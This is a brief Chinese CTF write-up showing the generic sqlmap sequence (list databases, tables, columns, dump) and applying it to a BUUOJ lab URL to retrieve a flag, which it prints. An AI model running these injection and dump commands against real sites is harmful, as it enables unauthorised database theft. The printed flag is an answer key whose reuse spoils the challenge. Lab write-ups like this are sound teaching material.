一般步骤
1、查看当前表:python sqlmap.py -u URL --dbs
2、查看表名: python sqlmap.py -u URL -D 数据库名(第一步查出)--tables
3、获取表的子段: python sqlmap.py -u URL -D 数据库名 -T 表名(第二步查出)--columns
4、查看dump的字段: python sqlmap.py -u URL -D 数据库名 -T 表名 -C 字段内容(第三步查出)--dump
实例
题目:
解题步骤:
1、点开链接出现界面
2、直接使用sqlmap注入,查看当前数据库
python sqlmap.py -u http://14ed36e3-ab93-4bbe-93b4-f8819dd45714.node4.buuoj.cn:81/index.php?id=1 --dbs
3、查看表名
python sqlmap.py -u http://14ed36e3-ab93-4bbe-93b4-f8819dd45714.node4.buuoj.cn:81/index.php?id=1 -D note --tables
4、 获取表的字段
pythonsqlmap.py -u http://14ed36e3-ab93-4bbe-93b4-f8819dd45714.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns
5、查看dump字段内容,得出flag
python sqlmap.py -u http://35bb1ac6-bf6d-4ece-af3f-8661e567e082.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C fllllag --dump
6、得出flag : n1book{union_select_is_so_cool}